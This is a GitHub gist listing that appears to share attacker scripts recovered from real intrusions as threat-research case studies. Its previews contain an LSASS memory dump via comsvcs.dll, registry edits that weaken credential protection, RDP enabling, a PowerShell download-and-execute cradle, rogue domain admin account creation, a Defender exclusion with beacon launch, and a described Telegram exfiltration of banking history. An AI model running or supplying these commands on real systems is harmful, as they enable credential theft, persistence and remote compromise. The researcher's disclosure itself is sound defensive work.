Dray Agha Purp1eW0lf
Purp1eW0lf
/ Case_study_two_veeam.ps1
Last active
January 8, 2026 21:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Ensure script runs with elevated privileges on the Veeam server. | |
| # Step 1: Detect Veeam SQL instance and database from registry or prompt if needed. | |
| $SQLServer = $null | |
| $SQLInstance = $null | |
| $SQLDBName = $null | |
| Add-Type -AssemblyName System.Security | |
| # Check new registry path (for VBR v12+ configurations) | |
| $baseRegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication" | |
| if (Test-Path "$baseRegPath\DatabaseConfigurations") { |
Purp1eW0lf
/ Case_study_one_credential_dump.ps1
Last active
January 8, 2026 21:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Comments are inserted English translation of Russian strings | |
| Write-Host "Пробуем создать дамп: $dumpFile` ## Trying to create dump: $dumpFile | |
| # Метод 1: Через Start-Process` ## Method 1: Via Start-Process | |
| Start-Process -FilePath "rundll32.exe" -ArgumentList "C:\Windows\System32\comsvcs.dll, MiniDump 832 $dumpFile full" -Wait -NoNewWindow` | |
| # Проверяем результат` ## Checking the result | |
| if (Test-Path $dumpFile) {` | |
| $file = Get-Item $dumpFile` |
Purp1eW0lf
/ Case_study_three_Chase_Telegram.ps1
Last active
January 8, 2026 21:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # =============================================== | |
| # Scan Chrome + Edge history files (ALL users, ALL profiles) | |
| # Search for "secure.chase.com" directly in History DB (no SQLite module) | |
| # Save matches to C:\H\History.txt | |
| # Save PC Name + User + count to C:\H\results.txt | |
| # If count > 10 send results.txt content to Telegram | |
| # Designed for running as service user (SYSTEM) via SimpleHelp | |
| # =============================================== | |
| try { |
Purp1eW0lf
/ November_intrusion_mimon.bat
Created
November 20, 2024 16:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f | |
| reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f | |
| reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f |
Purp1eW0lf
/ November_intrusion_openrdp.bat
Created
November 20, 2024 16:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f | |
| netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow | |
| netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes | |
| reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f |
Purp1eW0lf
/ SlashAndGrab_inject.ps1
Created
February 23, 2024 16:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\" | |
| # Check for Administrator rights | |
| if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) { | |
| Write-Host 'Please Run as Administrator!' -ForegroundColor Red | |
| Exit | |
| } | |
| # Check and return current user name | |
| $currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1] | |
| # Paths |
Purp1eW0lf
/ SlashAndGrab_application_extract.evtx
Created
February 23, 2024 16:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Excerpt from Application.evtx EventID 0 | |
| EventData: | |
| Data: | |
| - "Transferred files with action 'Transfer':\r\nRunSchedulerTask.ps1\r\nRunSchedulerTaskOnce.ps1\r\n\r\nVersion: 22.10.11109.8417\r\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (9dd8b1107d6a42d9)\\ScreenConnect.ClientService.exe\r\n" | |
| Channel: Application | |
| EventID: 0 | |
| EventID_attributes: | |
| SystemTime: "2024-02-23T04:06:06Z" |
Purp1eW0lf
/ SlashAndGrab_new_users.ps1
Created
February 23, 2024 16:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| net user /add default test@2021! /domain | |
| net group \"Domain Admins\" default /add /domain | |
| net group \"Enterprise Admins\" default /add /domain | |
| net group \"Remote Desktop Users\" default /add /domain | |
| net group \"Group Policy Creator Owners\" default /add /domain | |
| net group \"Schema Admins\" default /add /domain | |
| net user default /active:yes /domain | |
| net user /add default1 test@2021! /domain | |
| net user /add default1 test@2021! /domain |
Purp1eW0lf
/ SlashAndGrab_beacon_evade.ps1
Created
February 23, 2024 16:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf | |
| #Exclude directory in Defender | |
| powershell.exe Add-MpPreference -ExclusionPath C:\\programdata -Force | |
| #Deploy beacon | |
| rundll32.exe c:\\programdata\\update.dat UpdateSystem |
Purp1eW0lf
/ SlashAndGrab_transfer_extract.ps1
Created
February 23, 2024 16:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json', | |
| \'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json', | |
| \'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json', | |
| \'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json', | |
| \'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json', | |
| \'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json', | |
| \'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json', | |
| \'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json', | |
| \'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json', | |
| \'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json', |
NewerOlder